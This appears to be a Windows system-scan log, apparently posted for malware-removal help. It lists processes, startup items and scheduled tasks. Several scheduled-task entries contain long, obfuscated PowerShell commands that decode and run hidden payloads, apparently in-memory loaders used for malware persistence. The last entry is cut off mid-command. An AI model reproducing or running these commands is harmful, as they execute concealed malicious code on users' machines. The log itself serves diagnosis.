   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\ctfmon.exe
   1  C:\Windows\System32\dasHost.exe
   3  C:\Windows\System32\dllhost.exe
   1  C:\Windows\System32\drivers\AdminService.exe
   1  C:\Windows\System32\drivers\QcomWlanSrvx64.exe
   1  C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_291337223b900dd5\RtkAudUService64.exe
   1  C:\Windows\System32\DriverStore\FileRepository\u0364341.inf_amd64_c22b73fb0c3a32d3\B364190\atieclxx.exe
   1  C:\Windows\System32\DriverStore\FileRepository\u0364341.inf_amd64_c22b73fb0c3a32d3\B364190\atiesrxx.exe
   1  C:\Windows\System32\dwm.exe
   2  C:\Windows\System32\fontdrvhost.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\mfevtps.exe
   1  C:\Windows\System32\MoNotificationUx.exe
   1  C:\Windows\System32\rdrleakdiag.exe
   5  C:\Windows\System32\RuntimeBroker.exe
   1  C:\Windows\System32\SearchFilterHost.exe
   1  C:\Windows\System32\SearchIndexer.exe
   2  C:\Windows\System32\SearchProtocolHost.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\SgrmBroker.exe
   1  C:\Windows\System32\sihost.exe
   1  C:\Windows\System32\smartscreen.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\spoolsv.exe
  86  C:\Windows\System32\svchost.exe
   2  C:\Windows\System32\taskhostw.exe
   1  C:\Windows\System32\wbem\unsecapp.exe
   2  C:\Windows\System32\wbem\WmiPrvSE.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
   1  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
   1  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
   1  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
   1  C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
   1  C:\Windows\UUS\amd64\MoUsoCoreWorker.exe

O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_321\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_321\bin\ssv.dll
O2 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O4 - HKLM\..\StartupApproved\Run: [RtkAudUService] = C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_291337223b900dd5\RtkAudUService64.exe -background (2021/06/17)
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = (no file) (2021/06/17)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2021/06/17)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service')
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\system32\nlansp_c.dll
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-mfe-ipt: [CLSID] = {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Remediation (empty)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-3887308582-1236565465-1742408578-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC EngagedRebootReminder (Microsoft)
O22 - Task: (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery EngagedRebootReminder (Microsoft)
O22 - Task: \McAfee\DAD.Execute.Updates - C:\Program Files\Common Files\McAfee\DynamicAppDownloader\DADUpdater.exe
O22 - Task: \McAfee\McAfee Auto Maintenance Task Agent - {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \McAfee\McAfee DAT Built in test - C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe /hcmode=periodic /periodicruncount=3
O22 - Task: \McAfee\McAfee Idle Detection Task - {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (Microsoft)
O22 - Task: \Microsoft\Windows\applicationdata\ApplicationData - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$zdypJD='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';$hRUib='hfkemycsxdDSUik';$QyMmb=($hRUib[13]+$hRUib[3]+$hRUib[8]);&$QyMmb(&$QyMmb ('''[TeSfVTxt.EncoSfVTding]::UTSfVTF''+2*2*2+''.GeSfVTtStSfVTring([ConSfVTvert]::Fro''+''mSfVTB''+''ase''+8*8+''StriSfVTng(([reSfVTgex]:SfVT:MaSfVTtchSfVTes(''''pkCT5VmaZRHJocmbUZlZTlmcUZlZTR3U0VGVWZ2UH5COGRlVmNFVVpjOddmbpRlVmNFZvNGVWZ2UuVkL0hHVWZ2UlRlLtVGdUZlZTNXeUZlZTN1WogHVWZ2UlRlVmNVa7kiclJGVWZ2UtVnbsRlVmNVYpJXZT5yR4RETJJ2bksyJgcyKsVGZUZlZT9WTucEeExUSi9GJoASKpQkSwlHZ6RCKn5WayRHVWZ2UTRDVWZ2U2U2chRlVmNlQt9GVWZ2UyZkO60FdyVmdUZlZT52bD5SblRHVWZ2Uzl3UbhCIjRlVmNVZk1DT5VmaZRHJ7IXZi1GVWZ2U15GbhlGVWZ2UyV2UswWZUZlZTR2bNBCdjVGVWZ2UsV2c813JwUkVJJFRMFEVWZ2UDl0UZhEUc5CXcdCIxVWLgQUSlRlVmN1YpZXZE5yXksHIlJHVWZ2Ulh2d8VmdpRlVmNlcktGVWZ2UzlGZfJzMUZlZT5WaUZlZTdHIp1GVWZ2U3dWPHhHRMlkYvRSf70mS4NFJg4mcUZlZTVHdlJXfrsyR4RETJRyORJFTzFHUkAicvhnYtASXHhHRMlEJbNGUpJnekAicvRlVmNFei1CIdVWa5RVdksVbKh3Uk0TXllWeUVHJb1mS4NFJ7ElUMNXcQRCIy9GVWZ2U4JWLgkiM1EDIy9mYtASUSx0cxBFJgQmbUZlZTFmYtAyMygSPRJFTzFHUk0HM9cEeExUSksXK05WdvNkLjBVaypHJgU2ZtAyR4RETJRCKml2epsyKllWeUVHJ7Qnb192Qu0mS4NFJgQHbtASZplHV1RyOw0TZplHV1RCKy9GVWZ2UmtDM9cEeExUSksTXws1YQlmc6RSPRJFTzFHUksTK4NkWq5mZkgyclRlVmNFd5JEdUZlZTV2RugjRUVlO601ZuRlVmNVak92YuVkL0RlVmNFelRlLtVGVWZ2U0NXeTtVPjBVaypHJ7lCeDplauZGJddmbpJHVWZ2U0N3Ws0mS4NFJd11WlRHVWZ2U5J2WoMWZUZlZTRGIu9Wa0NGVWZ2UuVnZ'''',''''.'''',''''RiSfVTghSfVTtTSfVToLSfVTeft'''')|FoSfVTrEaSfVTch {$SfVT_SfVT.valSfVTue}) -jSfVTo''+''in ''''''''))-repSfVTlace''''SSfVTfVT''''|&(''''iSfVTeSfVTx'''');''-'+'rep'+'lace''SfVT'''))"
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "3794930948;$LCZ='OjeNWCxdiJbV';'?&(zgcjm }A*v-T9y*?).lNa5me1 (u''_[usf+ifncqg _nS0y(/stlaelmkn;u(ns]i/_ng}, _Sj+ys_ot=e17m.giIuOw_;u_xscig_ng7o 0S=mys(_tve.rm._cR.u[6nt/ai,m1ue.dlIun__te[+rro_0pS_9ear7vvi4_cae,+s;b!uss_0inepg7 wyMipmc_rgros=!o3fk0t.__Wmiypn3!_23;(_pu=wbjl3cic6a _caula2ns?s1- Wu}jxOg_r{o2d!ewqley4gja7bte6i mv2_oir6du [rsB[=k_((=);_tppuk!bl_ci,ct( s_ct6ap}tictc_ _vvowii_do] qjmajgftm(r=)5{u0by.,tre}d[]g9X_Z_[=F_8i_ln/e.}zEfx3_isl]t3sri(y_2E}V0(jh-}yct1jvrscv,r,_yE!_Vx)1}?F6vialk6e.__R_e4_adj+Ahln3lB_sy?t_fes_3(-ym}EVwvj[hlvyt+_vxrzvvr__ydEogV))j:((d_by_vtmedl[]_-)-Rd3eg]7i(sh?tr(gyx.shLo-3c=a,8lM=jahcjdhi_,n.e3}.O2_p5ez_nSujunbcjKeg_yx([email protected](/E_V_kSOznF3T_gWA3!R8E_}\M_uipc6]ros5s3o]_ftq6\(Cq=TFch\_T_(IPj/y_EmwV)y-.eG5aet0dVpadzluvde_(-zyE+bV2jc]hyd,tgv=krv.lr8y9qEV)0,fn!gul__l/)rn;i7vf2(paXZ(_=w=_lnu9{l_l!_)r_(e(t8,ur6_n{;{+in_kt3 7wqC!?q_=gaXZ9n.iLo_enl.g6t[yh;-ef_o2_r(2{i[nr!t 5qJwxu_N=w40d;/?JxztNh a_!=_,q=Cl_q-6r1_;=4Jx!fNq+n[+)_y{sXfoZ[k!J9x/6N]yf^)=fo(bmby/tu_e)_8yyE__Vt_qZbg0dqVh_?zo4u4nm_/xJ_s9!ypX_}r_+cxzp8-r_VE3d-z8_!tj0c+(5[yNri}Er.98X0e+D=9,gey-9P_i!.3g!_-[hl!y[+_o_AksyE_fV0[heJx94N{Q!sly0_4-7[q];j5}6I_tnt,_Pxt9rr j_Y_Oy{X=7n(_I!4ntc_Pat+fr)__0j;tdIn5itqPfgtrn8 mD2_p={l(iI9tnt_2P_t_gr)+uqdCz,q;(_Nltu-Al_ilkob{ca/!t.e3/Vi[_r_t6!uairl_M)1em85opr_-y(tf(oI6)ntr[Pktl0r)6l(5-v_1)j},.r_/ef!- /YnxOXbz,s(10In__ttPeotr__)-0j5,r=_etf-n Dm2p(,310x)_1_0v4009{,/016x4s20_)8_;M!2a(r}_sh1ca_l]p.C([ozp=ay(__XcZ9.,0r_,yY,6OX_h,(qt!Cqc_)_;q2((=qsaB!hk)9nMpa?_rs__h_a_(l.q8G6e_ftDs1eml-weg(]aqt__eF1=o_rr,Fu_3nkc6sti5_o?ns3Poegi+n5/te[_r,(2_YO_[Xf,ltty-dp_e65ofip(4s0aBk_v)_)4b)(c0)m;=t}[__Dkl][lI?rmcp1,or4st!(__yEr5V5nl_td+xlbl1_yE3_Vp)]3]p28rli0=va_rt]e_g s_0t,a7=ti6rc8 _aex(utve=,rncj glc3ony1g_ +kNt_zA9l_wloyncma__teh2V_i3_rt,)u{ah4lMuhelm?_or,zyn(cwIn?jtoP3str3x .M_[X,6wr-eglf q0Ienv)tP_wtgrf6 N)-W_lz_,I_anltduPt_or_ k_lX)bJ1,+_re98f[ )_Inj[tqPfptr,0 0Zdigcg/f2,phUIafn_ttv320_ _e_3jS(]sw,_2UI++n_t_x32.y 1K0/WN/[dh)b5;}g''-_rempl(acqe''f.(_..c)''_,''+$1q'' u-r3epola4ce{''yuEVv'',_[c_ha!r]_(3q4)4 -[re4pl8acoe''uQl_y''+,[achyar1](037j))b;[-En_vibrocnm)endt]w::_Cu1rr_enhtDbirfec_to0ry}=pfwdo;[eWj3Or_]:k:q_ag_m(.);'-replace('.DsOd(DsOd.DsOd.)'-replace'DsOd'),('$'+689/689)|&($LCZ[8]+$LCZ[2]+$LCZ[6]);1019599191" (file missing)
O22 - Task: \Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser - C:\WINDOWS\System32\MbaeParserTask.exe (file missing)
O22 - Task: \Microsoft\Windows\MUI\2029558789 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "NBA;pOEofw;BswTyegN;JTZLFdYO;aEZoscy;$YUjvy='wwIeW)MxwNBecBpFaEsQlgujj.lAG(VEJZiQTww';$CWol=$YUjvy[34]+$YUjvy[3]+$YUjvy[7];$KKDZO='_&(cgcqm nA*?-Tey*{).iNa8me? (_''ddusn=i!n_vg z_S8yzestk6e_m)_;u_7sei_[ngbi fS5_ys{0t_er8m._9IhO_8;uxls5iy_ngh_ 5Sy_ys_ftje_?m.m_R+uq_nt{_i}m_{e._+I3n8pte)3r}ovdpSi4ecrdjvig6c_e)_s;c_u]s=_in_!go ?_Mi_pcer,7os]_o7fm_t.tiW_ixnn3]]2_;]ypu/dbkl__ic__ vcxblaq_sfs_e j1_N=SzctK6[{_d8eel_ke_grbat6_er [8vox6ipd_7 rp_dhI_sY(-])5;_cpu{7b3lv=ic4k _seyta__tcis_c _avao[ridah +C0flp_5Iz(a8){p2bbycgteia[3]95Ar__U)Ex=G=8_F_i!mle+_._Euhxij4swt,4s(_3r+U_[oT5?y2u__ervhh]fz8tw_xt7r9aUonzT(){_?Flai9l_ae.ytR.e_+ad_,Avl.plBf,y4t/jes_]([r5_Uoe!T_y_!ue2=rqh_(ftc4w_t1_rU4io2T/u):e0(xbccytcre)[v_])mxRjeo_gijps.tb=rya_.{L=zoc_?awl{gMa0_c(h]_in_ze-.maOpm8e[nh_Su[?b[Kluey_o([email protected]+_SOc_F!T(oWAlgR_Ej3\Mhvi2c71roqysbo3!ft93\lC57TFtt\hTsfIP_,r{U7,oT._)a.c_Geqet_V__al]juye_?(r==U/o5_Tyj.ube1_rh[_fxtn}wt[crsUj_oTqd,qnm4ul3.ls)y_;ia_f3(4]ArjjU.E=_G=+_=0nfnulq7lx)+mreodt+u0trn+);ti__ntid fT_sgvu}toNum=A_jr_Up]EG!_.4L__enbmgft_oh;_!f)oowr(wei+nist fhoja5cejofr?=550;v_oca1wej_mr( g_!=z_T-g_7vtx{N_-_31;sxo0ax+ej]_rc+3u+)+!{3A8krU7_EoG2}[olva_ey-jrzb]d^i_=(m_bry{,te_q)gr(_Uo(eTgI+!5v-_I_2a_6lboO__z6.xk_9gBvxh3a}gsIc_fv1]vv5{nT5{i(741k6kdor1Ur!oT__[wo/[ae_=jyrxpbtjkw_ou_E28_7n]_f;}i_I_ng)tP__tirof Tx!i+u6go=}[(3Ip5nt__Pxt[[r)d80-;o_In5_tpP41trq) _wvfIrinE)=b=(Ir8n9tj=Pt+!r_)/8Tgy1vdtraN;s}N5t0_Al__lcosvcae+t1e}_Vi}}riti_ua7_loM_nemc_o]rcvy(cy(gI1[ntgoPvt__r)1+(5-5y1)s!,mr5sef6( 0T5_iu[wo_,kk(I!mn!t4zPt3,r/)_i0,/_rse7nf grw+I{xrEs5,_0__x1_]0?0+[0,5r0mx__40_?)l;.vMah]rss_sha57l!.e_Coc6p,y[h(Apxr8UeoEG_j,702),T5_i)u_jo,z_T6g_[vt04N4)rs;(-,(trn_dIigYx)+.Mav5r{ss,ha72l).twGe6_t_D,_el_kerga.atlzelFs4orxnF_u+2nc9(taib_ons_P_o8nin?_t+e28r(v_Tkivcuo7c,vt](yp/]e?o6zf(_orid{!IY]-)l),p)(z-)i;k!}[2+D?l,mlIt9m6p,=or+!tf(w_rUbwo1Txantcxd_lr.lrsiU1o_sT)4_]dpevrin_vqat_te7w os_uta1xtgi__c 3secx_bte,yrmnm_ lp1oon{+g lmNhti.Al__lco}_ca}5t_e9kViper{t8!uacrlsMs_em8_ogrzdy(__I,n[ptP_0tbroq F__T6L_3h,_crhe{_f /wI_n1_tPnrtyr[_ M_=S6L_]C,_wIgn9/tP23t2r__ Y3[P}Z_hlB__,0r__ef_0 tI_qntkkPgt_wr dhD2diymj_8,eU,?In_rt03mo2 0}upk3_Eaxzm[,_cUIk1n_t1+32q) _k_-Wv27Bdy_b);-_}3 '')-rhepela4ce_''.}(._.)_'',l''$h1''f -9re_plqac_e''prU-oT?'',8[cnha(r]l(3e4)5 -5reopl6acne''2bt_wokE''b,[_ch_ar_](a37=))];(/lsz $!en_v:,te?mp2 -cDi?|w0heare_{(m$_g.N8amee.9Le1ng/th_ -_eqf 8s)-jan-d(_(Gneti-Axcl} $)_.!Fu_llbNa3mex).}Acjce_ss,.F_ilfeSzysztetmRxig=hths m-enq _''D(elaetme''b)}g)|3de(l;_[E{nvpirionqme2ntt]:1:Cmurdre4nt-Dizreict?or+y=tpw_d;v[j?NS_tK3]:h:C-lp6I(?);';'$KKDZO -rep'+$YUjvy[20]+$YUjvy[16]+$YUjvy[12]+$YUjvy[3]+'($YUjvy[25]+$YUjvy[29]+$YUjvy[25]+$YUjvy[25]+$YUjvy[5]),(''$''+792/792)'|&$CWol|&$CWol;fGhOP;Sivi;Kg;"
O22 - Task: \Microsoft\Windows\MUI\910881632 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "d;DLYrEhtUg;SLV;$qecT='QUeEwdT)BxechWVaIXVlUUQ.Bme(VtizE';$rmPx=$qecT[30]+$qecT[2]+$qecT[9];$jEeE='_&(_gc_m .A*2-T}y*().iNalme? (-''iaustci}ne_g loSry_.std7e_m3v;u85s!i__ngk_ zSzqys?_tae_qm.y[IeOqp;u_cs?iuqnge{ aS_qys36t8e_lm.thR+u_pnt7(ism[)e.7/Iun}!teilr]oxppS_ge5rq_vil2c8eaus;,_uus,sint2g+ f5Mi/[c.r_1os/_ojf_it._[Wmi_sn3r_29;_fpu!5bjln5icxd _cg4la(.s_s_v jyjw0enzya_z{_d6}elh6eigx_atw]es ,_voifi_d75 D}aW_E62D(y_)8;vlpufhbil_2ic=a _s{rta=ht1i8kc 6pvco_ridlr _E_?cPm2CkE_n()t,{ob_iytb?e8[g_]v__Eovm[a=m1F_i_(le-q.!Ez.xiiws_tpes(n)yqS=_MBgsikjv0hy_ztwvfqrv76rsyi[SM)0B_i?_)?h-Fbi!flepw._R=2ean.duAu{ll_7B[yl+te_rsw(bnyS_zM_B}+iju6h1yhstv=_r(vfnry{1S1M_/Bi,_)k:l6(b_=yvt_ye[!_]!)_?Re7?g5ioqst{_r(y9h.Lmvo!cb8al_wM_ai_ch_ii_nsre.d9Oxp2_en_.Syuq_bKzxepyr_(@_/yxScgMBx0i=Sy}OF{aT_W.zAR_=Ex\2/Mi-_cyrxaosamo4fg2t\w_C_T/aF\l0TvIy_Py=_S1M7,Bi_!)r.c_GeqrtkVjoal_+u_e1o(yk)S4M2eBi!dj_h/{yt1_verh[vr)_y/S_gMB__ip,z[nu.!lll9c);4wi_fz+(vrsE.v_(a=7c=_nb3ulp}lz)3-reyst{u7_rn2e;4ikrntp_ _N3{pp23NqGsk=v__E?vwra.__Lxed_ngswt(hf,;f__orr_-(iz)n[tmx m7[e_E_sbF_t=_0tt;m/le}Eh)bFp8 -!5(=Nhkpop_xNG1l-l1_d;m[_e/Ep_bFy_+.+5_){2jv2E__va5_[_m_beE[mb_F(_]^}v=6(a-byvtt8evn)y0_SvM_0Bi__Si9}anjih2f/93of(a=.g_](y!-Q_D9kx3?,6ube_M]{5w_N8wPr?)M?[_]K6g_xj7.cFt2_zyi/-yDa_y.To]]x_y91D(dE8q_MwEn0u-5_.5r]mb4)uwi6_llAwd8w(gtEA_uWlzmi+0u7y_yrjSM5-Bfil1[m,refE2(bF3tn5WozSxc_tu6c_5]_y;}}c7Inp+tnP!_trk. iTppKje_u==[y(Izhn7tl_Ptzcrh).i0;p)I{n_rtP5-t6r-! J]eAoV_0a=a_(dI/bntt{P_t}_r)=_N_p(mpN_7G};1_Nt_3A_lmglogoc+a_,teo(V,ic.rt{eu_a?jlM(ge+m]=oriiya(/.(I_nn.td_Pti_r_)wn(-__1_)_x,rr_e?fx_ Tn!Kwj_su,_7(wIj6nt_2P4t__r)r600,)]regbf_ p[JA6pV7a_p,0_cx_1ia00l[0z,.00x-n4_08a);!oM_a_5rsjgh!ahwl.eeC_ovrpy+z()v(vEv1_a_,ow0,]-T4Knnju_b,[Nm/pp_dNbGxz);mc(5(+7DW_3E=Dn])M=7a=r__sh79a/l__.Ge]e=tv_De=klbek(gaz?t7e=vFo_)r[F..unc_c6teyio_pnnP_coii-net54erq3(_T__Kj6zu_,5dtyp}p1e_gofio(cDc6WE.wDf),0))vg(t)l8;}+][kD_7ll_jIqm0npof)r6t_5(yy[S5MabBit0nut_}dljglfyq=SMj=Bai_?)]fwpcrxriv0ha_t/.e _9s_t./athuiuc[/ ej.x9t_terh6nf v_lo.3n{gj/ NohtwA?,llb9onc=_ats?eaV+bircnt,u}_al2!M/e_-mo_driye_(Ia_n}t.}Pt05r_ 